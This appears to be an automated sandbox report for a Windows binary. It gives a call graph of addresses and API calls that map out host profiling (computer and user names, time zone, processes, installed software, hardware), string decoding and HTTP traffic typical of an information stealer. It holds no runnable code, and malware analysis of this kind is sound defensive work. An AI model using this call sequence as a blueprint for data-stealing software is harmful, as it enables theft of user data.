95767->95768 95769 40fa9c 4 API calls 95768->95769 95770 41463a 95769->95770 95771 40f9e1 lstrcpy 95770->95771 95772 414647 95771->95772 95773 40fa9c 4 API calls 95772->95773 95774 414665 95773->95774 95775 40f9e1 lstrcpy 95774->95775 95776 414672 95775->95776 95777 40fa9c 4 API calls 95776->95777 95778 41468f 95777->95778 95779 40f9e1 lstrcpy 95778->95779 95780 41469c 95779->95780 95781 40fa9c 4 API calls 95780->95781 95782 4146b9 95781->95782 95783 40f9e1 lstrcpy 95782->95783 95784 4146c6 95783->95784 95785 40fa9c 4 API calls 95784->95785 95786 4146e3 95785->95786 95787 40f9e1 lstrcpy 95786->95787 95788 4146f0 95787->95788 96440 40fc38 GetProcessHeap HeapAlloc GetLocalTime wsprintfA 95788->96440 95790 414701 95791 40fa9c 4 API calls 95790->95791 95792 41470e 95791->95792 95793 40f9e1 lstrcpy 95792->95793 95794 41471b 95793->95794 95795 40fa9c 4 API calls 95794->95795 95796 414738 95795->95796 95797 40f9e1 lstrcpy 95796->95797 95798 414745 95797->95798 95799 40fa9c 4 API calls 95798->95799 95800 414762 95799->95800 95801 40f9e1 lstrcpy 95800->95801 95802 41476f 95801->95802 96441 410415 memset RegOpenKeyExA 95802->96441 95804 414780 95805 40fa9c 4 API calls 95804->95805 95806 41478d 95805->95806 95807 40f9e1 lstrcpy 95806->95807 95808 41479a 95807->95808 95809 40fa9c 4 API calls 95808->95809 95810 4147b7 95809->95810 95811 40f9e1 lstrcpy 95810->95811 95812 4147c4 95811->95812 95813 40fa9c 4 API calls 95812->95813 95814 4147e1 95813->95814 95815 40f9e1 lstrcpy 95814->95815 95816 4147ee 95815->95816 95817 4104a2 2 API calls 95816->95817 95818 414803 95817->95818 95819 40fa28 3 API calls 95818->95819 95820 414815 95819->95820 95821 40f9e1 lstrcpy 95820->95821 95822 414822 95821->95822 95823 40fa9c 4 API calls 95822->95823 95824 41484b 95823->95824 95825 40f9e1 lstrcpy 95824->95825 95826 414858 95825->95826 95827 40fa9c 4 API calls 95826->95827 95828 414875 95827->95828 95829 40f9e1 lstrcpy 95828->95829 95830 414882 95829->95830 95831 4104dd 13 API calls 95830->95831 95832 414897 95831->95832 95833 40fa28 3 API calls 95832->95833 95834 4148a9 95833->95834 95835 40f9e1 lstrcpy 95834->95835 95836 4148b6 95835->95836 95837 40fa9c 4 API calls 95836->95837 95838 4148df 95837->95838 95839 40f9e1 lstrcpy 95838->95839 95840 4148ec 95839->95840 95841 40fa9c 4 API calls 95840->95841 95842 414909 95841->95842 95843 40f9e1 lstrcpy 95842->95843 95844 414916 95843->95844 95845 414922 GetCurrentProcessId 95844->95845 96445 411001 OpenProcess 95845->96445 95848 40fa28 3 API calls 95849 414945 95848->95849 95850 40f9e1 lstrcpy 95849->95850 95851 414952 95850->95851 95852 40fa9c 4 API calls 95851->95852 95853 41497b 95852->95853 95854 40f9e1 lstrcpy 95853->95854 95855 414988 95854->95855 95856 40fa9c 4 API calls 95855->95856 95857 4149a5 95856->95857 95858 40f9e1 lstrcpy 95857->95858 95859 4149b2 95858->95859 95860 40fa9c 4 API calls 95859->95860 95861 4149cf 95860->95861 95862 40f9e1 lstrcpy 95861->95862 95863 4149dc 95862->95863 95864 40fa9c 4 API calls 95863->95864 95865 4149f9 95864->95865 95866 40f9e1 lstrcpy 95865->95866 95867 414a06 95866->95867 96450 41064b GetProcessHeap HeapAlloc 95867->96450 95870 40fa9c 4 API calls 95871 414a24 95870->95871 95872 40f9e1 lstrcpy 95871->95872 95873 414a31 95872->95873 95874 40fa9c 4 API calls 95873->95874 95875 414a4e 95874->95875 95876 40f9e1 lstrcpy 95875->95876 95877 414a5b 95876->95877 95878 40fa9c 4 API calls 95877->95878 95879 414a78 95878->95879 95880 40f9e1 lstrcpy 95879->95880 95881 414a85 95880->95881 96456 41077c _EH_prolog CoInitializeEx CoInitializeSecurity CoCreateInstance 95881->96456 95884 40fa28 3 API calls 95885 414aac 95884->95885 95886 40f9e1 lstrcpy 95885->95886 95887 414ab9 95886->95887 95888 40fa9c 4 API calls 95887->95888 95889 414ae2 95888->95889 95890 40f9e1 lstrcpy 95889->95890 95891 414aef 95890->95891 95892 40fa9c 4 API calls 95891->95892 95893 414b0c 95892->95893 95894 40f9e1 lstrcpy 95893->95894 95895 414b19 95894->95895 96469 410925 _EH_prolog CoInitializeEx CoInitializeSecurity CoCreateInstance 95895->96469 95898 40fa28 3 API calls 95899 414b40 95898->95899 95900 40f9e1 lstrcpy 95899->95900 95901 414b4d 95900->95901 95902 40fa9c 4 API calls 95901->95902 95903 414b76 95902->95903 95904 40f9e1 lstrcpy 95903->95904 95905 414b83 95904->95905 95906 40fa9c 4 API calls 95905->95906 95907 414ba0 95906->95907 95908 40f9e1 lstrcpy 95907->95908 95909 414bad 95908->95909 96482 40fbfd GetProcessHeap HeapAlloc GetComputerNameA 95909->96482 95912 40fa9c 4 API calls 95913 414bcb 95912->95913 95914 40f9e1 lstrcpy 95913->95914 95915 414bd8 95914->95915 95916 40fa9c 4 API calls 95915->95916 95917 414bf5 95916->95917 95918 40f9e1 lstrcpy 95917->95918 95919 414c02 95918->95919 95920 40fa9c 4 API calls 95919->95920 95921 414c1f 95920->95921 95922 40f9e1 lstrcpy 95921->95922 95923 414c2c 95922->95923 96484 40fbcb GetProcessHeap HeapAlloc GetUserNameA 95923->96484 95925 414c3d 95926 40fa9c 4 API calls 95925->95926 95927 414c4a 95926->95927 95928 40f9e1 lstrcpy 95927->95928 95929 414c57 95928->95929 95930 40fa9c 4 API calls 95929->95930 95931 414c74 95930->95931 95932 40f9e1 lstrcpy 95931->95932 95933 414c81 95932->95933 95934 40fa9c 4 API calls 95933->95934 95935 414c9e 95934->95935 95936 40f9e1 lstrcpy 95935->95936 95937 414cab 95936->95937 96485 4103a0 7 API calls 95937->96485 95940 40fa28 3 API calls 95941 414cd2 95940->95941 95942 40f9e1 lstrcpy 95941->95942 95943 414cdf 95942->95943 95944 40fa9c 4 API calls 95943->95944 95945 414d08 95944->95945 95946 40f9e1 lstrcpy 95945->95946 95947 414d15 95946->95947 95948 40fa9c 4 API calls 95947->95948 95949 414d32 95948->95949 95950 40f9e1 lstrcpy 95949->95950 95951 414d3f 95950->95951 96488 40fce5 _EH_prolog 95951->96488 95954 40fa28 3 API calls 95955 414d69 95954->95955 95956 40f9e1 lstrcpy 95955->95956 95957 414d76 95956->95957 95958 40fa9c 4 API calls 95957->95958 95959 414da5 95958->95959 95960 40f9e1 lstrcpy 95959->95960 95961 414db2 95960->95961 95962 40fa9c 4 API calls 95961->95962 95963 414dd5 95962->95963 95964 40f9e1 lstrcpy 95963->95964 95965 414de2 95964->95965 96498 40fc38 GetProcessHeap HeapAlloc GetLocalTime wsprintfA 95965->96498 95967 414df6 95968 40fa9c 4 API calls 95967->95968 95969 414e06 95968->95969 95970 40f9e1 lstrcpy 95969->95970 95971 414e13 95970->95971 95972 40fa9c 4 API calls 95971->95972 95973 414e36 95972->95973 95974 40f9e1 lstrcpy 95973->95974 95975 414e43 95974->95975 95976 40fa9c 4 API calls 95975->95976 95977 414e63 95976->95977 95978 40f9e1 lstrcpy 95977->95978 95979 414e70 95978->95979 96499 40fc92 GetProcessHeap HeapAlloc GetTimeZoneInformation 95979->96499 95982 40fa9c 4 API calls 95983 414e8e 95982->95983 95984 40f9e1 lstrcpy 95983->95984 95985 414e9b 95984->95985 95986 40fa9c 4 API calls 95985->95986 95987 414ebb 95986->95987 95988 40f9e1 lstrcpy 95987->95988 95989 414ec8 95988->95989 95990 40fa9c 4 API calls 95989->95990 95991 414eeb 95990->95991 95992 40f9e1 lstrcpy 95991->95992 95993 414ef8 95992->95993 95994 40fa9c 4 API calls 95993->95994 95995 414f1b 95994->95995 95996 40f9e1 lstrcpy 95995->95996 95997 414f28 95996->95997 96502 40fe18 GetProcessHeap HeapAlloc RegOpenKeyExA 95997->96502 96000 40fa9c 4 API calls 96001 414f4c 96000->96001 96002 40f9e1 lstrcpy 96001->96002 96003 414f59 96002->96003 96004 40fa9c 4 API calls 96003->96004 96005 414f7c 96004->96005 96006 40f9e1 lstrcpy 96005->96006 96007 414f89 96006->96007 96008 40fa9c 4 API calls 96007->96008 96009 414fa9 96008->96009 96010 40f9e1 lstrcpy 96009->96010 96011 414fb6 96010->96011 96505 40feb4 96011->96505 96014 40fa9c 4 API calls 96015 414fd4 96014->96015 96016 40f9e1 lstrcpy 96015->96016 96017 414fe1 96016->96017 96018 40fa9c 4 API calls 96017->96018 96019 415001 96018->96019 96020 40f9e1 lstrcpy 96019->96020 96021 41500e 96020->96021 96022 40fa9c 4 API calls 96021->96022 96023 41502e 96022->96023 96024 40f9e1 lstrcpy 96023->96024 96025 41503b 96024->96025 96520 40fe81 GetSystemInfo wsprintfA 96025->96520 96027 41504c 96028 40fa9c 4 API calls 96027->96028 96029 415059 96028->96029 96030 40f9e1 lstrcpy 96029->96030 96031 415066 96030->96031 96032 40fa9c 4 API calls 96031->96032 96033 415086 96032->96033 96034 40f9e1 lstrcpy 96033->96034 96035 415093 96034->96035 96036 40fa9c 4 API calls 96035->96036 96037 4150b3 96036->96037 96038 40f9e1 lstrcpy 96037->96038 96039 4150c0 96038->96039 96521 40ff81 GetProcessHeap HeapAlloc 96039->96521 96041 4150d1 96042 40fa9c 4 API calls 96041->96042 96043 4150de 96042->96043 96044 40f9e1 lstrcpy 96043->96044 96045 4150eb 96044->96045 96046 40fa9c 4 API calls 96045->96046 96047 41510b 96046->96047 96048 40f9e1 lstrcpy 96047->96048 96049 415118 96048->96049 96050 40fa9c 4 API calls 96049->96050 96051 41513b 96050->96051 96052 40f9e1 lstrcpy 96051->96052 96053 415148 96052->96053 96526 40ffea _EH_prolog 96053->96526 96056 40fa28 3 API calls 96057 415178 96056->96057 96058 40f9e1 lstrcpy 96057->96058 96059 415185 96058->96059 96060 40fa9c 4 API calls 96059->96060 96061 4151b7 96060->96061 96062 40f9e1 lstrcpy 96061->96062 96063 4151c4 96062->96063 96064 40fa9c 4 API calls 96063->96064 96065 4151e7 96064->96065 96066 40f9e1 lstrcpy 96065->96066 96067 4151f4 96066->96067 96532 4102c3 _EH_prolog 96067->96532 96069 41520f 96070 40fa28 3 API calls 96069->96070 96071 415224 96070->96071 96072 40f9e1 lstrcpy 96071->96072 96073 415231 96072->96073 96074 40fa9c 4 API calls 96073->96074 96075 415263 96074->96075 96076 40f9e1 lstrcpy 96075->96076 96077 415270 96076->96077 96078 40fa9c 4 API calls 96077->96078 96079 415293 96078->96079 96080 40f9e1 lstrcpy 96079->96080 96081 4152a0 96080->96081 96540 410071 _EH_prolog 96081->96540 96083 4152bd 96084 40fa28 3 API calls 96083->96084 96085 4152d3 96084->96085 96086 40f9e1 lstrcpy 96085->96086 96087 4152e0 96086->96087 96088 410071 15 API calls 96087->96088 96089 41530c 96088->96089 96090 40fa28 3 API calls 96089->96090 96091 41531f 96090->96091 96092 40f9e1 lstrcpy 96091->96092 96093 41532c 96092->96093 96094 40fa9c 4 API calls 96093->96094 96095 415358 96094->96095 96096 40f9e1 lstrcpy 96095->96096 96097 415365 96096->96097 96098 415379 lstrlenA 96097->96098 96099 415389 96098->96099 96100 40f923 lstrcpy 96099->96100 96101 41539f 96100->96101 96102 4010b1 2 API calls 96101->96102 96103 4153b7 96102->96103 96556 414437 _EH_prolog 96103->96556 96105 4153c4 96106 401061 _EH_prolog 96105->96106 96107 4153ea 96106->96107 96107->94536 96109 40f95a lstrcpy 96108->96109 96110 4041dd 96109->96110 96111 403a54 6 API calls 96110->96111 96112 4041e9 GetProcessHeap RtlAllocateHeap 96111->96112 96826 40fb4d 96112->96826 96114 404223 InternetOpenA StrCmpCA 96115 404242 96114->96115 96116 404378 InternetCloseHandle 96115->96116 96117 40424d InternetConnectA 96115->96117 96124 4042e9 96116->96124 96118 40426d HttpOpenRequestA 96117->96118 96119 40436f InternetCloseHandle 96117->96119 96120 4042a2 96118->96120 96121 404368 InternetCloseHandle 96118->96121 96119->96116 96122 4042a6 InternetSetOptionA 96120->96122 96123 4042bc HttpSendRequestA HttpQueryInfoA 96120->96123 96121->96119 96122->96123 96123->96124 96126 40430c 96123->96126 96124->94541 96125 404326 InternetReadFile 96125->96121 96125->96126 96126->96121 96126->96124 96126->96125 96827 4060db 96127->96827 96129 40ef5b 96133 40ed50 StrCmpCA 96155 40ed28 96133->96155 96136 40edc4 StrCmpCA 96136->96155 96139 40f923 lstrcpy 96139->96155 96140 40eee0 StrCmpCA 96140->96155 96145 40fa28 3 API calls 96145->96155 96147 40f95a lstrcpy 96147->96155 96148 40fa9c _EH_prolog lstrlenA lstrcpy lstrcat 96148->96155 96150 40f9e1 lstrcpy 96150->96155 96155->96129 96155->96133 96155->96136 96155->96139 96155->96140 96155->96145 96155->96147 96155->96148 96155->96150 96160 4010b1 _EH_prolog lstrcpy 96155->96160 96830 40d3fa _EH_prolog 96155->96830 96884 40d6bb _EH_prolog 96155->96884 96996 40b8af _EH_prolog 96155->96996 96160->96155 96385 40f923 lstrcpy 96384->96385 96386 402128 96385->96386 96386->95295 96388 401081 96387->96388 96388->95364 96389->95295 96390->95295 96391->95295 96392->95295 96393->95354 96394->95321 96395->95353 96396->95335 96397->95321 96398->95320 96399->95321 96400->95307 96401->95321 96403 40f923 lstrcpy 96402->96403 96404 402142 96403->96404 96404->95296 96405->95306 96406->95353 96408 4104c0 96407->96408 96409 40f923 lstrcpy 96408->96409 96410 4104d0 96409->96410 96410->95394 96411->95398 96413 403a6d 96412->96413 96413->96413 96414 403a74 ??_U@YAPAXI ??_U@YAPAXI ??_U@YAPAXI 96413->96414 96423 40fb4d 96414->96423 96416 403ab6 lstrlenA 96424 40fb4d 96416->96424 96418 403ac6 InternetCrackUrlA 96419 403ae4 96418->96419 96419->95407 96420->95532 96422 40f995 96421->96422 96422->95456 96423->96416 96424->96418 96425->95541 96426->95720 96427->95722 96428->95724 96429->95726 96430->95730 96431->95732 96433 40626c LocalAlloc 96432->96433 96434 4058f9 96432->96434 96433->96434 96435 40627c CryptStringToBinaryA 96433->96435 96434->95585 96434->95591 96435->96434 96436 406293 LocalFree 96435->96436 96436->96434 96437->95740 96438->95748 96439->95759 96440->95790 96442 410461 RegQueryValueExA 96441->96442 96443 41047c CharToOemA 96441->96443 96442->96443 96443->95804 96446 411041 96445->96446 96447 411025 K32GetModuleFileNameExA CloseHandle 96445->96447 96448 40f923 lstrcpy 96446->96448 96447->96446 96449 411050 96448->96449 96449->95848 96575 40fbbd 96450->96575 96453 41067e RegOpenKeyExA 96454 410677 96453->96454 96455 41069e RegQueryValueExA 96453->96455 96454->95870 96455->96454 96457 4107e5 96456->96457 96458 4108ea 96457->96458 96459 4107ed CoSetProxyBlanket 96457->96459 96460 40f923 lstrcpy 96458->96460 96461 41081d 96459->96461 96462 4108fb 96460->96462 96461->96458 96463 410851 VariantInit 96461->96463 96462->95884 96464 410874 96463->96464 96581 4106c4 _EH_prolog CoCreateInstance 96464->96581 96466 410882 FileTimeToSystemTime GetProcessHeap HeapAlloc wsprintfA 96467 40f923 lstrcpy 96466->96467 96468 4108de VariantClear 96467->96468 96468->96462 96470 41098e 96469->96470 96471 410996 CoSetProxyBlanket 96470->96471 96474 410a33 96470->96474 96475 4109c6 96471->96475 96472 40f923 lstrcpy 96473 410a44 96472->96473 96473->95898 96474->96472 96475->96474 96476 4109f2 VariantInit 96475->96476 96477 410a15 96476->96477 96587 410c8d LocalAlloc CharToOemW 96477->96587 96479 410a1d 96480 40f923 lstrcpy 96479->96480 96481 410a27 VariantClear 96480->96481 96481->96473 96483 40fc33 96482->96483 96483->95912 96484->95925 96486 40f923 lstrcpy 96485->96486 96487 41040d 96486->96487 96487->95940 96489 40f923 lstrcpy 96488->96489 96490 40fd0d GetKeyboardLayoutList LocalAlloc GetKeyboardLayoutList 96489->96490 96491 40fdf8 96490->96491 96496 40fd48 96490->96496 96493 40fe00 LocalFree 96491->96493 96494 40fe09 96491->96494 96492 40fd4d GetLocaleInfoA 96492->96496 96493->96494 96494->95954 96495 40fa9c _EH_prolog lstrlenA lstrcpy lstrcat 96495->96496 96496->96491 96496->96492 96496->96495 96497 40f9e1 lstrcpy 96496->96497 96497->96496 96498->95967 96500 40fce0 96499->96500 96501 40fcc4 wsprintfA 96499->96501 96500->95982 96501->96500 96503 40fe5b RegQueryValueExA 96502->96503 96504 40fe73 96502->96504 96503->96504 96504->96000 96506 40ff06 GetLogicalProcessorInformationEx 96505->96506 96507 40ff11 96506->96507 96508 40fedc GetLastError 96506->96508 96590 410ade GetProcessHeap HeapFree 96507->96590 96509 40ff65 96508->96509 96510 40fee7 96508->96510 96512 40ff6f 96509->96512 96591 410ade GetProcessHeap HeapFree 96509->96591 96518 40feeb 96510->96518 96512->96014 96513 40ff38 96513->96512 96517 40ff3e wsprintfA 96513->96517 96517->96512 96518->96506 96519 40ff5e 96518->96519 96588 410ade GetProcessHeap HeapFree 96518->96588 96589 410afb GetProcessHeap HeapAlloc 96518->96589 96519->96512 96520->96027 96592 410aa7 96521->96592 96524 40ffc1 wsprintfA 96524->96041 96527 40f923 lstrcpy 96526->96527 96531 410010 96527->96531 96528 41004c EnumDisplayDevicesA 96529 410061 96528->96529 96528->96531 96529->96056 96530 40f997 2 API calls 96530->96531 96531->96528 96531->96529 96531->96530 96533 40f923 lstrcpy 96532->96533 96534 4102ed CreateToolhelp32Snapshot Process32First 96533->96534 96535 410386 CloseHandle 96534->96535 96539 41031e 96534->96539 96535->96069 96536 410372 Process32Next 96536->96535 96536->96539 96537 40fa9c _EH_prolog lstrlenA lstrcpy lstrcat 96537->96539 96538 40f9e1 lstrcpy 96538->96539 96539->96536 96539->96537 96539->96538 96541 40f923 lstrcpy 96540->96541 96542 410095 RegOpenKeyExA 96541->96542 96543 4100e7 96542->96543 96544 4100c8 96542->96544 96546 4100f0 RegEnumKeyExA 96543->96546 96549 410283 96543->96549 96553 40f9e1 lstrcpy 96543->96553 96554 4101f2 RegQueryValueExA 96543->96554 96555 40fa9c _EH_prolog lstrlenA lstrcpy lstrcat 96543->96555 96545 40f95a lstrcpy 96544->96545 96548 4100d4 96545->96548 96546->96543 96547 410119 wsprintfA RegOpenKeyExA 96546->96547 96547->96549 96550 41015d RegQueryValueExA 96547->96550 96548->96083 96552 40f95a lstrcpy 96549->96552 96550->96543 96551 410187 lstrlenA 96550->96551 96551->96543 96552->96548 96553->96543 96554->96543 96555->96543 96594 413460 _EH_prolog 96556->96594 96558 41445a 96559 40f9e1 lstrcpy 96558->96559 96560 41447c 96559->96560 96561 40f9e1 lstrcpy 96560->96561 96562 4144a0 96561->96562 96563 40f9e1 lstrcpy 96562->96563 96564 4144ac 96563->96564 96565 40f9e1 lstrcpy 96564->96565 96566 4144b8 96565->96566 96567 4144bf Sleep 96566->96567 96568 4144cf CreateThread WaitForSingleObject 96566->96568 96567->96566 96569 40f923 lstrcpy 96568->96569 96598 413326 _EH_prolog 96568->96598 96570 4144fd 96569->96570 96596 4134ac _EH_prolog 96570->96596 96572 414510 96573 401061 _EH_prolog 96572->96573 96574 41451c 96573->96574 96574->96105 96578 40fb50 GetProcessHeap HeapAlloc RegOpenKeyExA 96575->96578 96577 40fbc2 96577->96453 96577->96454 96579 40fb93 RegQueryValueExA 96578->96579 96580 40fbaa 96578->96580 96579->96580 96580->96577 96582 410758 96581->96582 96583 4106fa SysAllocString 96581->96583 96582->96466 96583->96582 96585 410709 96583->96585 96584 410751 SysFreeString 96584->96582 96585->96584 96586 410735 _wtoi64 SysFreeString 96585->96586 96586->96584 96587->96479 96588->96518 96589->96518 96590->96513 96591->96512 96593 40ffab GlobalMemoryStatusEx 96592->96593 96593->96524 96595 413479 96594->96595 96595->96558 96597 4134cc 96596->96597 96597->96572 96607 40fb4d 96598->96607 96600 413347 lstrlenA 96601 41335e 96600->96601 96606 413353 96600->96606 96602 40f95a lstrcpy 96601->96602 96604 40f9e1 lstrcpy 96601->96604 96605 413406 StrCmpCA 96601->96605 96608 4043ad _EH_prolog 96601->96608 96602->96601 96604->96601 96605->96601 96605->96606 96607->96600 96609 40f95a lstrcpy 96608->96609 96610 4043dd 96609->96610 96611 403a54 6 API calls 96610->96611 96612 4043e9 96611->96612 96813 410dac 96612->96813 96614 404415 96615 404420 lstrlenA 96614->96615 96616 404430 96615->96616 96617 410dac 4 API calls 96616->96617 96618 40443e 96617->96618 96619 40f923 lstrcpy 96618->96619 96620 40444e 96619->96620 96621 40f923 lstrcpy 96620->96621 96622 40445f 96621->96622 96623 40f923 lstrcpy 96622->96623 96624 404470 96623->96624 96625 40f923 lstrcpy 96624->96625 96626 404481 96625->96626 96627 40f923 lstrcpy 96626->96627 96628 404492 StrCmpCA 96627->96628 96630 4044ae 96628->96630 96629 4044d4 96631 410b5c 3 API calls 96629->96631 96630->96629 96632 4044c3 InternetOpenA 96630->96632 96633 4044df 96631->96633 96632->96629 96643 404cf2 96632->96643 96634 40fa28 3 API calls 96633->96634 96635 4044f5 96634->96635 96636 40f9e1 lstrcpy 96635->96636 96637 404502 96636->96637 96638 40fa9c 4 API calls 96637->96638 96639 40452e 96638->96639 96640 40fa28 3 API calls 96639->96640 96641 404544 96640->96641 96645 40f95a lstrcpy 96643->96645 96655 404c4e 96645->96655 96655->96601 96814 410dbd CryptBinaryToStringA 96813->96814 96815 410db9 96813->96815 96814->96815 96816 410dda GetProcessHeap HeapAlloc 96814->96816 96815->96614 96816->96815 96817 410df7 CryptBinaryToStringA 96816->96817 96817->96815 96826->96114 97186 4060a4 96827->97186 96829 4060ea 96829->96155 97187 4060af 97186->97187 97190 405f70 97187->97190 97189 4060c0 97189->96829 97193 405e09 97190->97193 97194 405e22 97193->97194 97196 405e1a 97193->97196 97209 4059a0 97194->97209 97196->97189 97211 4059af 97209->97211 97210 4059b6 97210->97196 97215 405a53 97210->97215 97211->97210 97212 405a06 97211->97212 97236 410afb GetProcessHeap HeapAlloc 97212->97236 98375 6c6fb8ae 98376 6c6fb8ba ___scrt_is_nonwritable_in_current_image 98375->98376 98377 6c6fb8e3 dllmain_raw 98376->98377 98378 6c6fb8de 98376->98378 98387 6c6fb8c9 98376->98387 98379 6c6fb8fd dllmain_crt_dispatch 98377->98379 98377->98387 98388 6c6dbed0 DisableThreadLibraryCalls LoadLibraryExW 98378->98388 98379->98378 98379->98387 98381 6c6fb91e 98382 6c6fb94a 98381->98382 98389 6c6dbed0 DisableThreadLibraryCalls LoadLibraryExW 98381->98389 98383 6c6fb953 dllmain_crt_dispatch 98382->98383 98382->98387 98385 6c6fb966 dllmain_raw 98383->98385 98383->98387 98385->98387 98386 6c6fb936 dllmain_crt_dispatch dllmain_raw 98386->98382 98388->98381 98389->98386 98390 4138e7 98391 4138f2 98390->98391 98392 401061 _EH_prolog 98391->98392 98393 4138fe 98392->98393 98394 6c6fb694 98395 6c6fb6a0 ___scrt_is_nonwritable_in_current_image 98394->98395 98424 6c6faf2a 98395->98424 98397 6c6fb6a7 98398 6c6fb796 98397->98398 98399 6c6fb6d1 98397->98399 98418 6c6fb6ac ___scrt_is_nonwritable_in_current_image 98397->98418 98441 6c6fb1f7 IsProcessorFeaturePresent 98398->98441 98428 6c6fb064 98399->98428 98402 6c6fb6e0 __RTC_Initialize 98402->98418 98431 6c6fbf89 InitializeSListHead 98402->98431 98403 6c6fb7b3 ___scrt_uninitialize_crt __RTC_Initialize 98405 6c6fb79d ___scrt_is_nonwritable_in_current_image 98405->98403 98407 6c6fb828 98405->98407 98408 6c6fb7d2 98405->98408 98406 6c6fb6ee ___scrt_initialize_default_local_stdio_options 98409 6c6fb6f3 _initterm_e 98406->98409 98410 6c6fb1f7 ___scrt_fastfail 6 API calls 98407->98410 98445 6c6fb09d _execute_onexit_table _cexit ___scrt_release_startup_lock 98408->98445 98412 6c6fb708 98409->98412 98409->98418 98413 6c6fb82f 98410->98413 98432 6c6fb072 98412->98432 98420 6c6fb86e dllmain_crt_process_detach 98413->98420 98421 6c6fb83b 98413->98421 98414 6c6fb7d7 98446 6c6fbf95 __std_type_info_destroy_list 98414->98446 98417 6c6fb70d 98417->98418 98419 6c6fb711 _initterm 98417->98419 98419->98418 98423 6c6fb840 98420->98423 98422 6c6fb860 dllmain_crt_process_attach 98421->98422 98421->98423 98422->98423 98425 6c6faf33 98424->98425 98447 6c6fb341 IsProcessorFeaturePresent 98425->98447 98427 6c6faf3f ___scrt_uninitialize_crt 98427->98397 98448 6c6faf8b 98428->98448 98430 6c6fb06b 98430->98402 98431->98406 98433 6c6fb077 ___scrt_release_startup_lock 98432->98433 98434 6c6fb07b 98433->98434 98435 6c6fb082 98433->98435 98458 6c6fb341 IsProcessorFeaturePresent 98434->98458 98438 6c6fb087 _configure_narrow_argv 98435->98438 98437 6c6fb080 98437->98417 98439 6c6fb095 _initialize_narrow_environment 98438->98439 98440 6c6fb092 98438->98440 98439->98437 98440->98417 98442 6c6fb20c ___scrt_fastfail 98441->98442 98443 6c6fb218 memset memset IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 98442->98443 98444 6c6fb302 ___scrt_fastfail 98443->98444 98444->98405 98445->98414 98446->98403 98447->98427 98449 6c6faf9e 98448->98449 98450 6c6faf9a 98448->98450 98451 6c6fb028 98449->98451 98454 6c6fafab ___scrt_release_startup_lock 98449->98454 98450->98430 98452 6c6fb1f7 ___scrt_fastfail 6 API calls 98451->98452 98453 6c6fb02f 98452->98453 98455 6c6fafd6 98454->98455 98456 6c6fafb8 _initialize_onexit_table 98454->98456 98455->98430 98456->98455 98457 6c6fafc7 _initialize_onexit_table 98456->98457 98457->98455 98458->98437 98459 6c6c3060 ?Startup@TimeStamp@mozilla@ ?Now@TimeStamp@mozilla@@CA?AV12@_N ?InitializeUptime@mozilla@ 98464 6c6fab2a 98459->98464 98463 6c6c30db 98468 6c6fae0c _crt_atexit _register_onexit_function 98464->98468 98466 6c6c30cd 98467 6c6fb320 5 API calls ___raise_securityfailure 98466->98467 98467->98463 98468->98466 98469 6c6c35a0 98470 6c6c35c4 InitializeCriticalSectionAndSpinCount getenv 98469->98470 98485 6c6c3846 __aulldiv 98469->98485 98471 6c6c38fc strcmp 98470->98471 98482 6c6c35f3 __aulldiv 98470->98482 98475 6c6c3912 strcmp 98471->98475 98471->98482 98473 6c6c35f8 QueryPerformanceFrequency 98473->98482 98474 6c6c38f4 98475->98482 98476 6c6c3622 _strnicmp 98477 6c6c3944 _strnicmp 98476->98477 98476->98482 98479 6c6c395d 98477->98479 98477->98482 98478 6c6c376a QueryPerformanceCounter EnterCriticalSection 98481 6c6c37b3 LeaveCriticalSection QueryPerformanceCounter EnterCriticalSection 98478->98481 98484 6c6c375c 98478->98484 98480 6c6c3664 GetSystemTimeAdjustment 98480->98482 98483 6c6c37fc LeaveCriticalSection 98481->98483 98481->98484 98482->98473 98482->98476 98482->98477 98482->98479 98482->98480 98482->98484 98483->98484 98483->98485 98484->98478 98484->98481 98484->98483 98484->98485 98486 6c6fb320 5 API calls ___raise_securityfailure 98485->98486 98486->98474 98487 6c6dc930 GetSystemInfo VirtualAlloc 98488 6c6dc9a3 GetSystemInfo 98487->98488 98489 6c6dc973 98487->98489 98491 6c6dc9b6 98488->98491 98492 6c6dc9d0 98488->98492 98503 6c6fb320 5 API calls ___raise_securityfailure 98489->98503 98491->98492 98494 6c6dc9bd 98491->98494 98492->98489 98495 6c6dc9d8 VirtualAlloc 98492->98495 98493 6c6dc99b 98494->98489 98498 6c6dc9c1 VirtualFree 98494->98498 98496 6c6dc9ec 98495->98496 98497 6c6dc9f0 98495->98497 98496->98489 98504 6c6fcbe8 GetCurrentProcess TerminateProcess 98497->98504 98498->98489 98503->98493 98505 6c6fb830 98506 6c6fb86e dllmain_crt_process_detach 98505->98506 98507 6c6fb83b 98505->98507 98509 6c6fb840 98506->98509 98508 6c6fb860 dllmain_crt_process_attach 98507->98508 98507->98509 98508->98509 98510 6c6fb9c0 98511 6c6fb9ce dllmain_dispatch 98510->98511 98512 6c6fb9c9 98510->98512 98514 6c6fbef1 GetSystemTimeAsFileTime GetCurrentThreadId GetCurrentProcessId QueryPerformanceCounter ___get_entropy 98512->98514 98514->98511

                                                                                    Executed Functions

                                                                                    Function 00417645 Relevance: 207.0, APIs: 114, Strings: 4, Instructions: 490libraryloaderCOMMON
                                                                                    Download Yara Rule

                                                                                    Control-flow Graph

                                                                                    APIs
                                                                                    • GetProcAddress.KERNEL32(74DD0000,00416AAC), ref: 00417659
                                                                                    • GetProcAddress.KERNEL32 ref: 00417670
                                                                                    • GetProcAddress.KERNEL32 ref: 00417687
                                                                                    • GetProcAddress.KERNEL32 ref: 0041769E
                                                                                    • GetProcAddress.KERNEL32 ref: 004176B5
                                                                                    • GetProcAddress.KERNEL32 ref: 004176CC
                                                                                    • GetProcAddress.KERNEL32 ref: 004176E3
                                                                                    • GetProcAddress.KERNEL32 ref: 004176FA
                                                                                    • GetProcAddress.KERNEL32 ref: 00417711
                                                                                    • GetProcAddress.KERNEL32 ref: 00417728
                                                                                    • GetProcAddress.KERNEL32 ref: 0041773F
                                                                                    • GetProcAddress.KERNEL32 ref: 00417756
                                                                                    • GetProcAddress.KERNEL32 ref: 0041776D
                                                                                    • GetProcAddress.KERNEL32 ref: 00417784
                                                                                    • GetProcAddress.KERNEL32 ref: 0041779B
                                                                                    • GetProcAddress.KERNEL32 ref: 004177B2
                                                                                    • GetProcAddress.KERNEL32 ref: 004177C9
                                                                                    • GetProcAddress.KERNEL32 ref: 004177E0
                                                                                    • GetProcAddress.KERNEL32 ref: 004177F7
                                                                                    • GetProcAddress.KERNEL32 ref: 0041780E
                                                                                    • GetProcAddress.KERNEL32 ref: 00417825
